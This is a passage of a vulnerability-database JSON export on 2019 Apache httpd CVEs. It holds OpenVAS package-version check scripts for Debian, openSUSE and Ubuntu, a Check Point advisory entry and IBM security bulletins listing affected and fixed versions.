rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"apache2-suexec-custom\", ver:\"2.4.25-3+deb9u8\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"apache2-suexec-pristine\", ver:\"2.4.25-3+deb9u8\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"apache2-utils\", ver:\"2.4.25-3+deb9u8\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"apache2\", ver:\"2.4.38-3+deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"apache2-bin\", ver:\"2.4.38-3+deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"apache2-data\", ver:\"2.4.38-3+deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"apache2-dev\", ver:\"2.4.38-3+deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"apache2-doc\", ver:\"2.4.38-3+deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"apache2-ssl-dev\", ver:\"2.4.38-3+deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"apache2-suexec-custom\", ver:\"2.4.38-3+deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"apache2-suexec-pristine\", ver:\"2.4.38-3+deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"apache2-utils\", ver:\"2.4.38-3+deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libapache2-mod-md\", ver:\"2.4.38-3+deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libapache2-mod-proxy-uwsgi\", ver:\"2.4.38-3+deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}\n\nexit(0);", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2020-01-31T16:47:01", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2019-09-03T00:00:00", "type": "openvas", "title": "openSUSE: Security Advisory for apache2 (openSUSE-SU-2019:2051-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-10098", "CVE-2019-10082", "CVE-2019-10081", "CVE-2019-9517", "CVE-2019-10097", "CVE-2019-10092"], "modified": "2020-01-31T00:00:00", "id": "OPENVAS:1361412562310852684", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310852684", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.852684\");\n script_version(\"2020-01-31T08:04:39+0000\");\n script_cve_id(\"CVE-2019-10081\", \"CVE-2019-10082\", \"CVE-2019-10092\", \"CVE-2019-10097\", \"CVE-2019-10098\", \"CVE-2019-9517\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 08:04:39 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2019-09-03 02:03:51 +0000 (Tue, 03 Sep 2019)\");\n script_name(\"openSUSE: Security Advisory for apache2 (openSUSE-SU-2019:2051-1)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=openSUSELeap15\\.0\");\n\n script_xref(name:\"openSUSE-SU\", value:\"2019:2051-1\");\n script_xref(name:\"URL\", value:\"https://lists.opensuse.org/opensuse-security-announce/2019-09/msg00004.html\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'apache2'\n package(s) announced via the openSUSE-SU-2019:2051-1 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"This update for apache2 fixes the following issues:\n\n Security issues fixed:\n\n - CVE-2019-9517: Fixed HTTP/2 implementations that are vulnerable to\n unconstrained internal data buffering (bsc#1145575).\n\n - CVE-2019-10081: Fixed mod_http2 that is vulnerable to memory corruption\n on early pushes (bsc#1145742).\n\n - CVE-2019-10082: Fixed mod_http2 that is vulnerable to read-after-free in\n h2 connection shutdown (bsc#1145741).\n\n - CVE-2019-10092: Fixed limited cross-site scripting in mod_proxy\n (bsc#1145740).\n\n - CVE-2019-10097: Fixed mod_remoteip stack buffer overflow and NULL\n pointer dereference (bsc#1145739).\n\n - CVE-2019-10098: Fixed mod_rewrite configuration vulnerability to open\n redirect (bsc#1145738).\n\n This update was imported from the SUSE:SLE-15:Update update project.\n\n Patch Instructions:\n\n To install this openSUSE Security Update use the SUSE recommended\n installation methods\n like YaST online_update or 'zypper patch'.\n\n Alternatively you can run the command listed for your product:\n\n - openSUSE Leap 15.1:\n\n zypper in -t patch openSUSE-2019-2051=1\n\n - openSUSE Leap 15.0:\n\n zypper in -t patch openSUSE-2019-2051=1\");\n\n script_tag(name:\"affected\", value:\"'apache2' package(s) on openSUSE Leap 15.0.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSELeap15.0\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"apache2\", rpm:\"apache2~2.4.33~lp150.2.23.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"apache2-debuginfo\", rpm:\"apache2-debuginfo~2.4.33~lp150.2.23.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"apache2-debugsource\", rpm:\"apache2-debugsource~2.4.33~lp150.2.23.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"apache2-devel\", rpm:\"apache2-devel~2.4.33~lp150.2.23.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"apache2-event\", rpm:\"apache2-event~2.4.33~lp150.2.23.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"apache2-event-debuginfo\", rpm:\"apache2-event-debuginfo~2.4.33~lp150.2.23.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"apache2-example-pages\", rpm:\"apache2-example-pages~2.4.33~lp150.2.23.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"apache2-prefork\", rpm:\"apache2-prefork~2.4.33~lp150.2.23.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"apache2-prefork-debuginfo\", rpm:\"apache2-prefork-debuginfo~2.4.33~lp150.2.23.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"apache2-utils\", rpm:\"apache2-utils~2.4.33~lp150.2.23.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"apache2-utils-debuginfo\", rpm:\"apache2-utils-debuginfo~2.4.33~lp150.2.23.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"apache2-worker\", rpm:\"apache2-worker~2.4.33~lp150.2.23.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"apache2-worker-debuginfo\", rpm:\"apache2-worker-debuginfo~2.4.33~lp150.2.23.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"apache2-doc\", rpm:\"apache2-doc~2.4.33~lp150.2.23.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-09-20T14:39:23", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2019-09-18T00:00:00", "type": "openvas", "title": "Ubuntu Update for apache2 USN-4113-2", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-10098", "CVE-2019-10082", "CVE-2019-10081", "CVE-2019-9517", "CVE-2019-0197", "CVE-2019-10097", "CVE-2019-10092"], "modified": "2019-09-20T00:00:00", "id": "OPENVAS:1361412562310844179", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310844179", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.844179\");\n script_version(\"2019-09-20T05:25:28+0000\");\n script_cve_id(\"CVE-2019-0197\", \"CVE-2019-10081\", \"CVE-2019-10082\", \"CVE-2019-10092\", \"CVE-2019-10097\", \"CVE-2019-10098\", \"CVE-2019-9517\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-09-20 05:25:28 +0000 (Fri, 20 Sep 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-09-18 02:01:06 +0000 (Wed, 18 Sep 2019)\");\n script_name(\"Ubuntu Update for apache2 USN-4113-2\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=(UBUNTU18\\.04 LTS|UBUNTU19\\.04|UBUNTU16\\.04 LTS)\");\n\n script_xref(name:\"USN\", value:\"4113-2\");\n script_xref(name:\"URL\", value:\"https://lists.ubuntu.com/archives/ubuntu-security-announce/2019-September/005121.html\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'apache2'\n package(s) announced via the USN-4113-2 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"USN-4113-1 fixed vulnerabilities in the Apache HTTP server.\nUnfortunately, that update introduced a regression when proxying\nbalancer manager connections in some configurations. This update\nfixes the problem.\n\nWe apologize for the inconvenience.\n\nOriginal advisory details:\n\nStefan Eissing discovered that the HTTP/2 implementation in Apache\ndid not properly handle upgrade requests from HTTP/1.1 to HTTP/2 in\nsome situations. A remote attacker could use this to cause a denial\nof service (daemon crash). This issue only affected Ubuntu 18.04 LTS\nand Ubuntu 19.04. (CVE-2019-0197)\n\nCraig Young discovered that a memory overwrite error existed in\nApache when performing HTTP/2 very early pushes in some situations. A\nremote attacker could use this to cause a denial of service (daemon\ncrash). This issue only affected Ubuntu 18.04 LTS and Ubuntu 19.04.\n(CVE-2019-10081)\n\nCraig Young discovered that a read-after-free error existed in the\nHTTP/2 implementation in Apache during connection shutdown. A remote\nattacker could use this to possibly cause a denial of service (daemon\ncrash) or possibly expose sensitive information. This issue only\naffected Ubuntu 18.04 LTS and Ubuntu 19.04. (CVE-2019-10082)\n\nMatei Badanoiu discovered that the mod_proxy component of\nApache did not properly filter URLs when reporting errors in some\nconfigurations. A remote attacker could possibly use this issue to\nconduct cross-site scripting (XSS) attacks. (CVE-2019-10092)\n\nDaniel McCarney discovered that mod_remoteip component of Apache\ncontained a stack buffer overflow when parsing headers from a trusted\nintermediary proxy in some situations. A remote attacker controlling a\ntrusted proxy could use this to cause a denial of service or possibly\nexecute arbitrary code. This issue only affected Ubuntu 19.04.\n(CVE-2019-10097)\n\nYukitsugu Sasaki discovered that the mod_rewrite component in Apache\nwas vulnerable to open redirects in some situations. A remote attacker\ncould use this to possibly expose sensitive information or bypass\nintended restrictions. (CVE-2019-10098)\n\nJonathan Looney discovered that the HTTP/2 implementation in Apache did\nnot properly limit the amount of buffering for client connections in\nsome situations. A remote attacker could use this to cause a denial\nof service (unresponsive daemon). This issue only affected Ubuntu\n18.04 LTS and Ubuntu 19.04. (CVE-2019-9517)\");\n\n script_tag(name:\"affected\", value:\"'apache2' package(s) on Ubuntu 19.04, Ubuntu 18.04 LTS, Ubuntu 16.04 LTS.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"UBUNTU18.04 LTS\") {\n\n if(!isnull(res = isdpkgvuln(pkg:\"apache2\", ver:\"2.4.29-1ubuntu4.11\", rls:\"UBUNTU18.04 LTS\"))) {\n report += res;\n }\n\n if(!isnull(res = isdpkgvuln(pkg:\"apache2-bin\", ver:\"2.4.29-1ubuntu4.11\", rls:\"UBUNTU18.04 LTS\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nif(release == \"UBUNTU19.04\") {\n\n if(!isnull(res = isdpkgvuln(pkg:\"apache2\", ver:\"2.4.38-2ubuntu2.3\", rls:\"UBUNTU19.04\"))) {\n report += res;\n }\n\n if(!isnull(res = isdpkgvuln(pkg:\"apache2-bin\", ver:\"2.4.38-2ubuntu2.3\", rls:\"UBUNTU19.04\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nif(release == \"UBUNTU16.04 LTS\") {\n\n if(!isnull(res = isdpkgvuln(pkg:\"apache2\", ver:\"2.4.18-2ubuntu3.13\", rls:\"UBUNTU16.04 LTS\"))) {\n report += res;\n }\n\n if(!isnull(res = isdpkgvuln(pkg:\"apache2-bin\", ver:\"2.4.18-2ubuntu3.13\", rls:\"UBUNTU16.04 LTS\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-08-31T16:45:45", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2019-08-30T00:00:00", "type": "openvas", "title": "Ubuntu Update for apache2 USN-4113-1", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-10098", "CVE-2019-10082", "CVE-2019-10081", "CVE-2019-9517", "CVE-2019-0197", "CVE-2019-10097", "CVE-2019-10092"], "modified": "2019-08-30T00:00:00", "id": "OPENVAS:1361412562310844154", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310844154", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.844154\");\n script_version(\"2019-08-30T11:09:32+0000\");\n script_cve_id(\"CVE-2019-0197\", \"CVE-2019-10081\", \"CVE-2019-10082\", \"CVE-2019-10092\", \"CVE-2019-10097\", \"CVE-2019-10098\", \"CVE-2019-9517\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-08-30 11:09:32 +0000 (Fri, 30 Aug 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-08-30 02:00:40 +0000 (Fri, 30 Aug 2019)\");\n script_name(\"Ubuntu Update for apache2 USN-4113-1\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=(UBUNTU18\\.04 LTS|UBUNTU19\\.04|UBUNTU16\\.04 LTS)\");\n\n script_xref(name:\"USN\", value:\"4113-1\");\n script_xref(name:\"URL\", value:\"https://lists.ubuntu.com/archives/ubuntu-security-announce/2019-August/005090.html\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'apache2'\n package(s) announced via the USN-4113-1 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Stefan Eissing discovered that the HTTP/2 implementation in Apache\ndid not properly handle upgrade requests from HTTP/1.1 to HTTP/2 in\nsome situations. A remote attacker could use this to cause a denial\nof service (daemon crash). This issue only affected Ubuntu 18.04 LTS\nand Ubuntu 19.04. (CVE-2019-0197)\n\nCraig Young discovered that a memory overwrite error existed in\nApache when performing HTTP/2 very early pushes in some situations. A\nremote attacker could use this to cause a denial of service (daemon\ncrash). This issue only affected Ubuntu 18.04 LTS and Ubuntu 19.04.\n(CVE-2019-10081)\n\nCraig Young discovered that a read-after-free error existed in the\nHTTP/2 implementation in Apache during connection shutdown. A remote\nattacker could use this to possibly cause a denial of service (daemon\ncrash) or possibly expose sensitive information. This issue only\naffected Ubuntu 18.04 LTS and Ubuntu 19.04. (CVE-2019-10082)\n\nMatei Badanoiu discovered that the mod_proxy component of\nApache did not properly filter URLs when reporting errors in some\nconfigurations. A remote attacker could possibly use this issue to\nconduct cross-site scripting (XSS) attacks. (CVE-2019-10092)\n\nDaniel McCarney discovered that mod_remoteip component of Apache\ncontained a stack buffer overflow when parsing headers from a trusted\nintermediary proxy in some situations. A remote attacker controlling a\ntrusted proxy could use this to cause a denial of service or possibly\nexecute arbitrary code. This issue only affected Ubuntu 19.04.\n(CVE-2019-10097)\n\nYukitsugu Sasaki discovered that the mod_rewrite component in Apache\nwas vulnerable to open redirects in some situations. A remote attacker\ncould use this to possibly expose sensitive information or bypass\nintended restrictions. (CVE-2019-10098)\n\nJonathan Looney discovered that the HTTP/2 implementation in Apache did\nnot properly limit the amount of buffering for client connections in\nsome situations. A remote attacker could use this to cause a denial\nof service (unresponsive daemon). This issue only affected Ubuntu\n18.04 LTS and Ubuntu 19.04. (CVE-2019-9517)\");\n\n script_tag(name:\"affected\", value:\"'apache2' package(s) on Ubuntu 19.04, Ubuntu 18.04 LTS, Ubuntu 16.04 LTS.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"UBUNTU18.04 LTS\") {\n\n if(!isnull(res = isdpkgvuln(pkg:\"apache2\", ver:\"2.4.29-1ubuntu4.10\", rls:\"UBUNTU18.04 LTS\"))) {\n report += res;\n }\n\n if(!isnull(res = isdpkgvuln(pkg:\"apache2-bin\", ver:\"2.4.29-1ubuntu4.10\", rls:\"UBUNTU18.04 LTS\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nif(release == \"UBUNTU19.04\") {\n\n if(!isnull(res = isdpkgvuln(pkg:\"apache2\", ver:\"2.4.38-2ubuntu2.2\", rls:\"UBUNTU19.04\"))) {\n report += res;\n }\n\n if(!isnull(res = isdpkgvuln(pkg:\"apache2-bin\", ver:\"2.4.38-2ubuntu2.2\", rls:\"UBUNTU19.04\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nif(release == \"UBUNTU16.04 LTS\") {\n\n if(!isnull(res = isdpkgvuln(pkg:\"apache2\", ver:\"2.4.18-2ubuntu3.12\", rls:\"UBUNTU16.04 LTS\"))) {\n report += res;\n }\n\n if(!isnull(res = isdpkgvuln(pkg:\"apache2-bin\", ver:\"2.4.18-2ubuntu3.12\", rls:\"UBUNTU16.04 LTS\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "checkpoint_advisories": [{"lastseen": "2021-12-17T11:17:12", "description": "A buffer overflow vulnerability exists in Apache httpd server. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system or cause application crashes.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-03-05T00:00:00", "type": "checkpoint_advisories", "title": "Apache httpd Server Buffer Overflow (CVE-2019-10097)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.0, "vectorString": "AV:N/AC:M/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-10097"], "modified": "2020-03-05T00:00:00", "id": "CPAI-2019-1915", "href": "", "cvss": {"score": 6.0, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}}], "ibm": [{"lastseen": "2023-02-24T05:45:26", "description": "## Summary\n\nAspera Web Application (Faspex, Console, Shares, Orchestrator) have affected the following Apache vulnerabilities. \n\n## Vulnerability Details\n\n** CVEID: **[CVE-2019-9517](<https://vulners.com/cve/CVE-2019-9517>) \n** DESCRIPTION: **Some HTTP/2 implementations are vulnerable to unconstrained interal data buffering, potentially leading to a denial of service. The attacker opens the HTTP/2 window so the peer can send without constraint; however, they leave the TCP window closed so the peer cannot actually write (many of) the bytes on the wire. The attacker then sends a stream of requests for a large response object. Depending on how the servers queue the responses, this can consume excess memory, CPU, or both. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/165183](<https://exchange.xforce.ibmcloud.com/vulnerabilities/165183>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\n \n** CVEID: **[CVE-2019-10097](<https://vulners.com/cve/CVE-2019-10097>) \n** DESCRIPTION: **In Apache HTTP Server 2.4.32-2.4.39, when mod_remoteip was configured to use a trusted intermediary proxy server using the \"PROXY\" protocol, a specially crafted PROXY header could trigger a stack buffer overflow or NULL pointer deference. This vulnerability could only be triggered by a trusted proxy and not by untrusted HTTP clients. \nCVSS Base score: 5.6 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/165365](<https://exchange.xforce.ibmcloud.com/vulnerabilities/165365>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L) \n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM Aspera Faspex| 4.3.1 \nIBM Aspera Console| 3.3.3 \nIBM Aspera Shares| 1.9.12 \nIBM Aspera Orchestrator| 3.1.1 \n \n\n\n## Remediation/Fixes\n\nAffected Product(s)| Version(s) \n---|--- \nIBM Aspera Faspex| 4.4.0 \nIBM Aspera Console| 3.4.0 \nIBM Aspera Shares| 1.9.14 \nIBM Aspera Orchestrator| 3.2.0 \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2020-02-07T02:17:54", "type": "ibm", "title": "Security Bulletin: Aspera Web Application (Faspex, Console, Orchestrator, Shares) are affected by Apache vulnerabilities (CVE-2019-9517, CVE-2019-10097)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-10097", "CVE-2019-9517"], "modified": "2020-02-07T02:17:54", "id": "F36AA4B00757395D62B409E84AA540BE8053C4FB4D95307651543223FA3A1743", "href": "https://www.ibm.com/support/pages/node/1489179", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2023-02-24T01:39:42", "description": "## Summary\n\nHTTP Server is supported by IBM i. IBM i has addressed the applicable CVEs.\n\n## Vulnerability Details\n\n**CVEID:** [CVE-2019-9517](<https://vulners.com/cve/CVE-2019-9517>) \n**DESCRIPTION:** Multiple vendors are vulnerable to a denial of service, caused by an Internal Data Buffering attack. By opening the HTTP/2 window so the peer can send without constraint and sending a stream of requests for a large response object, a remote attacker could consume excessive CPU resources. \nCVSS Base Score: 7.5 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/165183> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\n**CVEID:** [CVE-2019-10081](<https://vulners.com/cve/CVE-2019-10081>) \n**DESCRIPTION:** Apache HTTP Server is 